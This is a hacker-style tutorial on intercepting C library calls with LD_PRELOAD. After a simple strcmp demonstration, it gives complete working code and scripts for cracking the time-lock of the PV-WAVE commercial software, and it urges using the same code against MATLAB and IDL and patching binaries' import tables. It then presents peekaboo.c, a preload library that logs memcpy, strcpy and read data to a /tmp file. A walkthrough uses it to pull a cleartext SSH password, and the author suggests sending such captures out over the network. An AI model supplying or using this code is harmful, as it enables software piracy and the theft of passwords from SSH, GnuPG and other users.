Nigrum Libro Interceptis

by the xorcist

LD_PRELOAD is the name of an environment variable on GNU/Linux and Solaris systems which instructs the dynamic linker to preload and bind a user-specified library prior to binding symbols from the system libraries.

This allows the user to completely intercept many function calls made by a program.

The mechanism is very simple to use and it is hoped that novice C programmers will be able to use this tutorial and its sample code to create libraries of their own.

Below, the reader is shown the basic effect of function overloading and a simple way to call the original function.  From there, we use these techniques to crack the time-lock of the PV-WAVE software (www.roguewave.com) and to steal passphrases from SSH.

We close with a brief discussion of other possible uses of LD_PRELOAD.

The Basics of Writing Overloadable Libraries

First, a C file is created which defines the functions that one wishes to intercept, optionally calling the original function by means of libdl.

It is compiled to .o, and linked to .so, and can then be used with LD_PRELOAD.

Let me contrive a simple example for you, and we'll walk through two different layers of intercepting and manipulating program flow through LD_PRELOAD.

main.c

#include <stdio.h>
#include <string.h>
int main()
{
  if (!strcmp("red", "black"))
    printf("true\n");
  else
    printf("false\n");
  return 0;
}

hack.c

/* A dummy strcmp() which claims that any two strings are equal */
int strcmp(const char *a, const char *b)
{
  return 0;
}

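Now, we compile our code.  (The -fno-builtin flag is there because newer GCC releases may evaluate a strcmp() of two string literals at compile time, in which case no call is left to intercept.)

$ gcc -fno-builtin -o foo main.c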
$ ./foo
false
$ gcc -fPIC -c hack.c ; ld -shared -Bsymbolic -o hack.so hack.o
$ export LD_PRELOAD=./hack.so
$ ./foo
true

Obviously, our dummy strcmp() worked like a charm, but it will always return 0.

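This is fine for this example, but in a real program, we'll need to be able to call the real strcmp()!  To do this, we maintain a function pointer to the real strcmp(), looked up with dlsym(), like so (dlsym() comes from libdl, so add -ldl to the link step on systems where it is a separate library):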

hack2.c

#define _GNU_SOURCE             /* needed for RTLD_NEXT */
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

/* Utility function to return the pointer to a function named by a string */
static void *getfunc(const char *funcName)
{
  void *tmp;

  if ((tmp = dlsym(RTLD_NEXT, funcName)) == NULL) {
    fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
    _exit(1);
  }
  return tmp;
}

/* Typedef ourselves a function pointer compatible with strcmp() */
typedef int (*strcmp_t)(const char *a, const char *b);

/* A new strcmp() which returns 0 if its arguments are "red" and "black";
 * otherwise it returns the true string comparison */
int strcmp(const char *a, const char *b)
{
  static strcmp_t old_strcmp = NULL;

  /* Set up old_strcmp as a name for the real strcmp() function (once) */
  if (!old_strcmp)
    old_strcmp = (strcmp_t) getfunc("strcmp");

  if ((!old_strcmp("red", a)) && (!old_strcmp("black", b)))
    return 0;

  return old_strcmp(a, b);
}

Using these basic techniques, and some creativity in the choice of which functions to overload, all sorts of useful things can be done.

Now that we've seen the basic mechanisms of using LD_PRELOAD, we'll start looking at practical uses.

Subverting Time-locked Demonstration Programs

The first application that we'll put together is a generic library for cracking time-locked demo programs.

The strategy that we will use is to create a shared library which constrains the time returned by gettimeofday() to a configurable interval (specified by environment variables).

This way, one instance of the library can be used to fool multiple time-locked demos using different valid date ranges.
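The interval mapping can be sketched on its own, apart from any hooking.  In this minimal sketch, map_into_interval() is a hypothetical helper name; it folds an arbitrary timestamp into [min, max) with a modulo.  The two guards (an empty interval, and a timestamp earlier than min) are assumptions of this sketch rather than part of the strategy described above.

```c
#include <time.h>

/* Fold `now` into the half-open interval [min, max).
 * Hypothetical helper for illustration only. */
time_t map_into_interval(time_t now, time_t min, time_t max)
{
    time_t span, offset;

    if (max <= min)             /* empty interval: pin the clock to min */
        return min;

    span = max - min;
    offset = (now - min) % span;
    if (offset < 0)             /* C's % keeps the sign of the dividend */
        offset += span;
    return min + offset;
}
```

With a window only a few seconds wide, every value returned stays within moments of min.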

As a field test, we'll apply our library against a working time-locked demo of PV-WAVE.

Just like many other commercial Linux/UNIX programs, this program uses FlexLM as its license manager.  Success against PV-WAVE therefore suggests that the same approach will work against many other commercial demos as well.

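We'll call our library fakedate.so and define the following environment variables:

FAKEDATE_MIN: the minimum time value to return, in seconds since the epoch.
FAKEDATE_MAX: the maximum time value to return, in seconds since the epoch.
FAKEDATE_NUMCALLS: how many calls receive a bogus time (0 means always).
FAKEDATE_DEBUG: if set, print debugging information to stderr.

Overloaded functions: gettimeofday() and time().

fakedate.c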

#define _GNU_SOURCE             /* needed for RTLD_NEXT */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <time.h>
#include <sys/time.h>
#include <dlfcn.h>

/* Declare global state that our hijacked functions use */

int HAVE_OPTS = 0;              /* Have we already checked the environment? */
int RUN = 0;                    /* How many times has gettimeofday() run */
int NUMCALLS = 0;               /* How many times to return a bogus time, 0 = always */
int DEBUG = 0;                  /* Do we print debugging info? */
time_t START_TIME;              /* Remember the time we started */
time_t MIN = 0;                 /* Minimum time value to return */
time_t MAX = 0;                 /* Maximum time value to return */

/* Pointer to the genuine gettimeofday(), looked up through libdl.
 * POSIX types the second argument as void *; older glibc headers use
 * struct timezone *, so adjust the prototypes to match your <sys/time.h>. */
typedef int (*gettimeofday_t)(struct timeval *tv, void *tz);
static gettimeofday_t real_gettimeofday = NULL;

/* Inspect the environment and set up the global state */
void loadopts(void)
{
  struct timeval tv;

  if (getenv("FAKEDATE_DEBUG"))
    DEBUG = 1;

  if (getenv("FAKEDATE_MAX"))
    MAX = atol(getenv("FAKEDATE_MAX"));
  else
    MAX = 1;

  if (getenv("FAKEDATE_NUMCALLS"))
    NUMCALLS = atol(getenv("FAKEDATE_NUMCALLS"));
  else
    NUMCALLS = 0;

  if (getenv("FAKEDATE_MIN"))
    MIN = atol(getenv("FAKEDATE_MIN"));
  else
    MIN = 0;

  /* Find the genuine gettimeofday() that our version shadows */
  real_gettimeofday = (gettimeofday_t) dlsym(RTLD_NEXT, "gettimeofday");
  if (!real_gettimeofday) {
    fprintf(stderr, "FakeDate: %s\n", dlerror());
    _exit(1);
  }

  real_gettimeofday(&tv, NULL);
  START_TIME = tv.tv_sec;
  HAVE_OPTS = 1;
}

int gettimeofday(struct timeval *tv, void *tz)
{
  int ret;

  if (!HAVE_OPTS)
    loadopts();

  /* Get the genuine current time */
  ret = real_gettimeofday(tv, tz);

  /* If we're munging the date, we map the time into our interval
   * (skipped when the interval is empty, to avoid dividing by zero) */
  if (MAX > MIN && ((NUMCALLS == 0) || (RUN++ < NUMCALLS)))
    tv->tv_sec = MIN + (tv->tv_sec - MIN) % (MAX - MIN);

  if (DEBUG) {
    fprintf(stderr, "FakeDate: GetTimeOfDay [%ld , %ld] ", (long) MIN, (long) MAX);
    fprintf(stderr, "(tv->tv_sec = %ld) ", (long) tv->tv_sec);
    fprintf(stderr, "(%d total calls)\n", NUMCALLS);
  }
  return ret;
}

time_t time(time_t *t)
{
  struct timeval tv;
  time_t h;

  /* Go through our own gettimeofday() so both functions agree */
  gettimeofday(&tv, NULL);

  h = tv.tv_sec;

  if (DEBUG)
    fprintf(stderr, "FakeDate: Time() [%ld, %ld] (Returned %ld)\n",
            (long) MIN, (long) MAX, (long) h);

  if (t)
    (*t) = h;

  return h;
}

Now, to direct this library against the PV-WAVE time-lock.

If we just finished installing PV-WAVE, we have 12 days to evaluate it before it shuts off (we'll use 11 days to be safe).

So we proceed by getting the time interval we are interested in as seconds from the epoch:

$ d=`date +'%s'` ; echo -e "\nMin: $d\nMax: $[$d+24*60*60*11]"

Min: 1192702886
Max: 1193653286
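The same arithmetic can be checked in C.  This is only a small sketch: window_end() is a hypothetical helper name, and the start value is the Min printed above.

```c
#include <time.h>

#define SECONDS_PER_DAY (24L * 60L * 60L)

/* End of an evaluation window that begins at `start` and lasts `days` days.
 * Hypothetical helper for illustration only. */
time_t window_end(time_t start, long days)
{
    return start + (time_t) (days * SECONDS_PER_DAY);
}
```

For a start of 1192702886 and 11 days, this gives 1192702886 + 950400 = 1193653286, the FAKEDATE_MAX value used in the scripts that follow.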

If PV-WAVE was installed to /usr/local/vni and the fakedate.so library is also placed there, we can now put a wave.sh front-end script in /usr/local/bin such as:

wave.sh

#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/vni/fakedate.so
export FAKEDATE_MIN=1192702886
export FAKEDATE_MAX=1193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

And that's it.

However, I'll give you a hint here.  You don't need to specify the epoch range as the full 11-day period.

In fact, it is somewhat better to constrain the interval to a few seconds.  This is because when the program does its expiry check, if the apparent time is very early in the evaluation period, no warnings or messages about time-outs or registration are given.

As the time counts down, PV-WAVE starts reminding you that it will expire.  By constraining the interval to just a few seconds, we ensure that PV-WAVE will never nag us.

We can now verify proper functionality.

First, you can break it by moving the epoch range in a copy of the front-end script ahead to force the program to time out:

$ cat broken
#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/lib/fakedate.so
export FAKEDATE_MIN=2192702886
export FAKEDATE_MAX=2193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

$ ./broken -64
The evaluation period for CL has expired.
Contact your system administrator

Now, you can move it back and voilà, it works again:

$ cat working
#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/lib/fakedate.so
export FAKEDATE_MIN=1192702886
export FAKEDATE_MAX=1193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

$ ./working -64
PV-WAVE Version 9.00 (linux linux64 x86_64).
Copyright (C) 2007, Visual Numerics, Inc.
All rights reserved. Unauthorized reproduction prohibited.

PV-WAVE v9.00 UNIX/WINDOWS
...

Next, let's actually set the system time ahead, say, one year and try the working script.

When we get our WAVE> prompt, we enter the command: PRINT, TODAY()

And we'll see a coded date structure equal to the system time and outside the licensed epoch range.

The first call to gettimeofday() fooled the expiry check and now we're returning the real value because FAKEDATE_NUMCALLS is equal to 1.

$ date; ./working -64
Wed Oct 22 18:15:22 EDT 2008

PV-WAVE Version 9.00 (linux linux64 x86_64).
Copyright (C) 2007, Visual Numerics, Inc.
All rights reserved. Unauthorized reproduction prohibited.
PV-WAVE v9.00 UNIX/WINDOWS

Your current interactive graphics device is: X
If you are not running on a linux integrated display use the SET_PLOT command to set the appropriate
graphics device (if you have not already done so).

The following function keys are defined with PV-WAVE commands:
F1 - Start the PV-WAVE Demonstration/Tutorial System
F2 - Invoke the PV-WAVE Online Help Facility
F3 - Output the PV-WAVE Session Status

PV-WAVE Visual Exploration technology available.
PV-WAVE IMSL Mathematics technology available.
PV-WAVE IMSL Statistics technology available.

Enter "NAVIGATOR" at the WAVE> prompt to start the PV-WAVE Navigator.

WAVE> PRINT, TODAY()
{ 2008  10  22  18  16      2.00000      93541.761      0 }
WAVE>
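The call budget behind this behavior can be sketched in isolation.  In this minimal sketch, should_fake() is a hypothetical helper name; it mirrors the test used in gettimeofday() earlier, where a budget of 0 means every call is faked and any other value fakes only that many calls.

```c
/* Decide whether this call should receive a fake time.
 * `run` counts the calls seen so far and advances whenever a budget is set.
 * Hypothetical helper for illustration only. */
int should_fake(int *run, int numcalls)
{
    if (numcalls == 0)          /* 0 = always fake */
        return 1;
    return (*run)++ < numcalls;
}
```

With a budget of 1, only the first call (the expiry check, in this session) is faked, and later calls such as TODAY() see the real clock.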

We now have a fully functional copy of PV-WAVE, and if we use the few-second trick, we don't even get the nagging registration reminders.

This library can also be leveraged against other commercial Linux applications, including pricey high-profile software like MATLAB, Research Systems Inc.'s IDL, and others.  (And don't forget to set your system time back to the current date!)

Function Tracing to Steal Passwords

While the operating system won't allow Set User ID (SUID) programs to honor LD_PRELOAD (so no intercepting passwd or su), there are other important programs, like GnuPG, SSH, Telnet, or KWalletManager which we can subvert in order to steal passphrases, plaintext, and other secret bits.

Which functions would be most useful to us?

We certainly can expect to get a peek up someone's skirt by overloading memcpy().

Likewise, strcpy() and strncpy() are good choices as well, and for the same reasons.

On the I/O side, we'll overload read().

We could easily think of many more functions to add here.

getpass() is conspicuously absent from our list only because it is deprecated.  If you're targeting a legacy application, though, it is easy enough to add.

Our method will be simple passive eavesdropping on the four above-named functions.

We'll export the data that we intercept by appending it to a file in /tmp.

If actually deployed, we'd want to take some precautions here.  Perhaps we might like to encrypt this file by burying a public-key into our lib and randomly generating a symmetric key.  Or, we could transmit the contents out over the network in real-time.  But for this example, I'll just leave it sitting in a file out in /tmp.

peekaboo.c

#define _GNU_SOURCE             /* needed for RTLD_NEXT */
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

#define FILENAME "/tmp/icu.txt"

/* Typedef our function pointers */
typedef void *(*memcpy_t)(void *dest, const void *src, size_t n);
typedef ssize_t (*read_t)(int FD, void *buf, size_t n);
typedef char *(*strcpy_t)(char *dest, const char *src);
typedef char *(*strncpy_t)(char *dest, const char *src, size_t n);

/* Our global file pointer */
FILE *peekaboofile = NULL;

/* Utility function to return the pointer to a function named by a string */
static void *getfunc(const char *funcName)
{
  void *tmp;

  if ((tmp = dlsym(RTLD_NEXT, funcName)) == NULL) {
    fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
    _exit(1);
  }
  return tmp;
}

/* Open the log file on first use */
void ensure_file(void)
{
  if (!peekaboofile)
    peekaboofile = fopen(FILENAME, "a");
}

char *strncpy(char *dest, const char *src, size_t n)
{
  static strncpy_t real_strncpy = NULL;

  ensure_file();
  fprintf(peekaboofile,
          "STRNCPY: \nSRC: %s\nDST: %s\nSIZE: %zu\n------------------------\n",
          src, dest, n);
  if (!real_strncpy)
    real_strncpy = (strncpy_t) getfunc("strncpy");
  return real_strncpy(dest, src, n);
}

char *strcpy(char *dest, const char *src)
{
  static strcpy_t real_strcpy = NULL;

  ensure_file();
  fprintf(peekaboofile,
          "STRCPY: \nSRC: %s\nDST: %s\n------------------------\n", src, dest);
  if (!real_strcpy)
    real_strcpy = (strcpy_t) getfunc("strcpy");
  return real_strcpy(dest, src);
}

void *memcpy(void *dest, const void *src, size_t n)
{
  static memcpy_t real_memcpy = NULL;

  ensure_file();
  fprintf(peekaboofile, "MEMCPY:\nSRC: ");
  fwrite(src, n, 1, peekaboofile);
  fprintf(peekaboofile, "\nDST: ");
  fwrite(dest, n, 1, peekaboofile);
  fprintf(peekaboofile, "\nSIZE: %zu\n----------------------\n", n);
  if (!real_memcpy)
    real_memcpy = (memcpy_t) getfunc("memcpy");
  return real_memcpy(dest, src, n);
}

ssize_t read(int FD, void *buf, size_t n)
{
  static read_t real_read = NULL;
  ssize_t i;

  ensure_file();
  if (!real_read)
    real_read = (read_t) getfunc("read");
  i = real_read(FD, buf, n);

  /* The buffer is not NUL-terminated, so log only the bytes actually read */
  fprintf(peekaboofile, "READ:\nFD: %d\nBUF: ", FD);
  if (i > 0)
    fwrite(buf, (size_t) i, 1, peekaboofile);
  fprintf(peekaboofile, "\nSIZE: %zu\n-------------------\n", n);
  return i;
}

For our field test with this library, we'll examine SSH.

Let's get right to it and test this out.

Set up LD_PRELOAD, and SSH to a host of your choice, and log in.

Now, let's take a look at /tmp/icu.txt with something like less.

SSH starts off making a bunch of strncpy() calls such as:

$ less /tmp/icu.txt
...

STRNCPY:
SRC: Argument list too long
DST:
SIZE: 32
-------------------
STRNCPY:
SRC: Exec format error
DST:
SIZE: 32
-------------------

...

where it is apparently setting up an internal array of messages.  Then we hit a block of several read() and memcpy() calls where the connection is established and options negotiated.

First, let's find out what the remote host and username are...

Search the file for the string SRC: ssh-connection and, a few memcpy() calls up, you'll find the username on the remote host.

Search for the string SRC: host@ and you'll find the remote hostname.

That was easy.

Now to find the password: Just search the file for the string password and you'll notice that near one of them (the third, in my capture) is the cleartext password intercepted by memcpy().

MEMCPY:
SRC: password
DST: none<F1><FE>rw
SIZE: 8
-------------------
MEMCPY:
SRC: ^Q
DST: <C2>
SIZE: 1
-------------------
MEMCPY:
SRC: ^@^@^@^H
DST: <BE> ^K<E0>
SIZE: 4
-------------------
MEMCPY:
SRC: this-is-my-secret-password
DST: <87>G<E2>^D@<E8>
SIZE: 8
-------------------

In experiments with this and other similar code, every user-land program tested that handles passwords was vulnerable to this sort of eavesdropping - including GnuPG, Telnet, rdesktop, etc.

This is abysmal, given how easy it is to frustrate this method.  Simple statically-linked clones of getenv() and strcmp() are all that are needed to inspect the environment for LD_PRELOAD at startup to ensure privacy.
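As a rough sketch of such a startup check: the function below scans an environment array for an LD_PRELOAD entry using only its own comparison loop, so it does not depend on a getenv() or strcmp() that may already have been replaced.  The names preload_requested() and is_preload_entry(), and the choice to pass the environment in as a parameter, are assumptions made for illustration.  A real program would also need to be linked so that the check itself cannot be interposed.

```c
#include <stddef.h>

/* Return 1 if `entry` begins with "LD_PRELOAD=", using no libc calls. */
static int is_preload_entry(const char *entry)
{
    static const char key[] = "LD_PRELOAD=";
    size_t i;

    for (i = 0; key[i] != '\0'; i++)
        if (entry[i] != key[i])     /* also stops at the end of a short entry */
            return 0;
    return 1;
}

/* Scan a NULL-terminated environment array (such as main()'s envp).
 * Hypothetical helper for illustration only. */
int preload_requested(char *const envp[])
{
    size_t i;

    if (envp == NULL)
        return 0;
    for (i = 0; envp[i] != NULL; i++)
        if (is_preload_entry(envp[i]))
            return 1;
    return 0;
}
```

A program could call preload_requested() on its environment first thing in main() and refuse to prompt for a passphrase when it returns 1.  This covers only the environment variable, not other ways a library might be preloaded.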

Import Table Patching

Since every piece of software is different, as you might expect, the results of using LD_PRELOAD to overload, say, gettimeofday() will differ.

Suppose, for example, you have a software package where only one binary includes time-lock licensing checks and other binaries use gettimeofday() for other uses.

You might like the other binaries to use the proper gettimeofday(), and only have the time-locked binary get tricked.

One way to do this is by patching the function import table.

Simply open your binary in a hex editor and search for gettimeofday.  You'll find that string in an area with other function names nearby.  Now, you can patch that string and rename it to getximeofday.

Now change your LD_PRELOAD library to provide a getximeofday() function.

The time-locked binary will be fooled, and other binaries will run the proper function and get the correct time.
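The hex-editor step amounts to a same-length byte replacement, which can be sketched on an in-memory copy of the file.  In this minimal sketch, rename_symbol() is a hypothetical helper name, and reading the binary into the buffer and writing it back out are left to the caller.  It matches the name together with its terminating NUL, so longer names that merely begin with the same text are untouched, though a longer name that ends in the same text would still match.

```c
#include <stddef.h>
#include <string.h>

/* Overwrite every NUL-terminated occurrence of `from` in buf with `to`.
 * Both names must have the same length so that no offsets in the file shift.
 * Returns the number of occurrences patched, or -1 if the lengths differ.
 * Hypothetical helper for illustration only. */
long rename_symbol(unsigned char *buf, size_t len,
                   const char *from, const char *to)
{
    size_t n = strlen(from);
    size_t i;
    long patched = 0;

    if (n == 0 || strlen(to) != n)
        return -1;

    /* n + 1 includes the terminating NUL of the name being searched for */
    for (i = 0; i + n + 1 <= len; i++) {
        if (memcmp(buf + i, from, n + 1) == 0) {
            memcpy(buf + i, to, n);
            patched++;
            i += n;             /* skip past the name just patched */
        }
    }
    return patched;
}
```

Keeping both names the same length is what makes the edit safe to do in place: nothing after the string moves.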

Using such methods, it is easy to get a very robust crack for many types of evaluation licensed software with minimal effort.

After the library is built, most software examples of that sort can be defeated in 20 to 30 seconds, or less.

Closing Comments

There are many other uses for LD_PRELOAD, naturally.

You might intercept writes to the sound card and dump PCM data to rip audio from software which otherwise does not support the ability to save (Adobe Flash, for instance).

Another important use is for function profiling and reverse engineering.

By overloading selected functions, you can obtain traces of function execution, or counts of the number of times a function was called, etc.

This can be very useful for general debugging purposes.
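A minimal sketch of the bookkeeping such a profiling library might keep.  The enum values and the trace_hit() and trace_count() names are hypothetical; the idea is that each wrapper calls trace_hit() with its own ID before forwarding to the real function.  Integer IDs are used rather than names so that the counters never call back into a string function that is itself being traced.

```c
/* IDs for the functions being traced (an illustrative selection) */
enum traced_fn { TRACE_MEMCPY, TRACE_STRCPY, TRACE_READ, TRACE_FN_COUNT };

static unsigned long trace_counts[TRACE_FN_COUNT];

/* Record one call to the function identified by `fn`. */
void trace_hit(enum traced_fn fn)
{
    if ((int) fn >= 0 && (int) fn < TRACE_FN_COUNT)
        trace_counts[fn]++;
}

/* Number of calls recorded so far for `fn` (0 for an unknown ID). */
unsigned long trace_count(enum traced_fn fn)
{
    if ((int) fn >= 0 && (int) fn < TRACE_FN_COUNT)
        return trace_counts[fn];
    return 0;
}
```

The counters are plain globals, so this sketch assumes a single-threaded target.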

